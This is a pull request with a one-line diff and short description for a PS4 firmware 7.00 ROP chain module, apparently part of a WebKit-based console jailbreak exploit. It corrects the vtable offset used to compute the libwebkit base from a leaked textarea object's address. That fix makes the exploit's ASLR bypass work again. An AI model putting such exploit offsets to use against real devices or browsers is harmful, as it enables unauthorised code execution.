### PR TITLE
fix 700 vtable offset

### DIFF
--- a/src/rop/ps4/700.mjs
+++ b/src/rop/ps4/700.mjs
@@ -136,7 +136,7 @@ function get_bases() {
   const textarea = document.createElement("textarea");
   const webcore_textarea = mem.addrof(textarea).readp(off.jsta_impl);
   const textarea_vtable = webcore_textarea.readp(0);
-  const off_ta_vt = 0x23ba060;
+  const off_ta_vt = 0x23ba070;
   const libwebkit_base = textarea_vtable.sub(off_ta_vt);
 
   const stack_chk_fail_import = libwebkit_base.add(offset_wk_stack_chk_fail);


### PR DESCRIPTION
Thanks for the project and your work on it!
The issue was a small difference in `off_ta_vt` which caused the other bases to be way off and cause the `"rdlo" string not found` errro.

Thanks to @dryenyen for testing and providing logs.

Resolves #6.